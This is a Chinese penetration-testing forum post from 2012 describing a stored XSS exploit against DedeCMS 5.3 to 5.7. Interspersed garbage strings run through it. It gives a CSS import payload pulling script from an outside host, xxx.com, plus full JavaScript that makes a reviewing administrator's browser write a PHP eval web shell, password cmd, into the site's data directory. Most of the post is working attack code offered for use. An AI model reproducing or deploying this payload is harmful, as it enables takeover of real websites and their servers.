中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
# @5 a0 N8 U, B9 [
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
5 A% U, H2 r& T/ l- m2 O
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
) D: T# s4 D/ w. W
下面说说利用方法。
$ A1 [7 S. {2 A2 N( g; |9 @! [
条件有2个:
1 C7 f) }* ~! D5 g; w! g. v- X
1.开启注册
2 }; ~) M9 z: y$ z* E, Y# {% V2 z' g
2.开启投稿
% o& L4 @$ x# K1 h: P: `
注册会员----发表文章
' n/ I7 i2 H# L X% T5 ~
内容填写:
$ K2 S, {: \' v7 H; [1 [
复制代码
! A6 |+ h) g. i
<style>@im\port'\
http://xxx.com/xss.css';
</style>
3 i3 `5 l4 S" S3 [; v/ D: K8 B: P
新建XSS.Css
. @( m: F5 j/ C' F: E0 M
复制代码
2 N6 _- S% D4 {5 T u: ?; ~
.body{
4 V9 F7 {% B! A p" s* w
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
7 A" c. L$ b( l
新建xss.js 内容为
3 S& I3 c3 w7 x4 P% d2 \- \& L
复制代码
1 ~0 N# B$ d& M/ o8 o# i/ c
1.var request = false;
* e6 J2 z4 U+ i( x8 a J+ C
2.if(window.XMLHttpRequest) {
9 y: f* |, R* C
3.request = new XMLHttpRequest();
# C4 s) L# x0 _ Y7 l- ]7 o5 o
4.if(request.overrideMimeType) {
9 d" o/ @& Z9 u) n$ |. _- G
5.request.overrideMimeType('text/xml');
- I4 L4 t9 {# j- P& \2 g3 g
6.}
: W" b: P; K$ g9 ?2 Q3 L' W
7.} else if(window.ActiveXObject) {
7 E( s4 ~2 b& p
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
# M3 A. {+ t& {. W3 d8 O/ `
9.for(var i=0; i<versions.length; i++) {
# t8 M$ V1 p0 J- O0 W, d( U0 H
10.try {
" ^; I# u9 B" ]. l
11.request = new ActiveXObject(versions);
6 _6 ~) J4 }! O, D/ c- y6 z
12.} catch(e) {}
/ b5 M( k9 {7 g
13.}
. `4 R2 J, c3 q, N6 z2 I
14.}
9 E2 n0 g$ e0 _# b$ h
15.xmlhttp=request;
7 L: P6 ]" \: M# g
16.function getFolder( url ){
, e0 r4 E2 b9 D! _! a8 z5 P/ T) G) q# t
17. obj = url.split('/')
: j7 Q6 ~$ n0 K J
18. return obj[obj.length-2]
( \ m; z: B8 v: C6 k) Q) G* [
19.}
# d. G3 k( J: v$ O7 @
20.oUrl = top.location.href;
) c8 G8 Z0 M: |/ D) d4 S
21.u = getFolder(oUrl);
; v* I, o9 Y @$ l5 m; N5 e
22.add_admin();
7 K. E! P6 D" Y+ C$ g2 h. d
23.function add_admin(){
% J8 g! ~# D3 r" G; `
24.var url= "/"+u+"/sys_sql_query.php";
( a% |! u8 h; N# \* a! u6 w' ^6 E
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
L" V% J6 N% \
26.xmlhttp.open("POST", url, true);
" m, U# V( x4 l; L& x9 ^( i- s o
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
5 {) y. M: B9 o
28.xmlhttp.setRequestHeader("Content-length", params.length);
+ c9 |' `, O" _! B! n
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
+ g7 w% _8 P" a+ V% R( U4 g8 b
30.xmlhttp.send(params);
& U& l# o) D8 x; h, Z
31.}
$ e( v: z% a' X5 u0 t, x/ }/ [
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2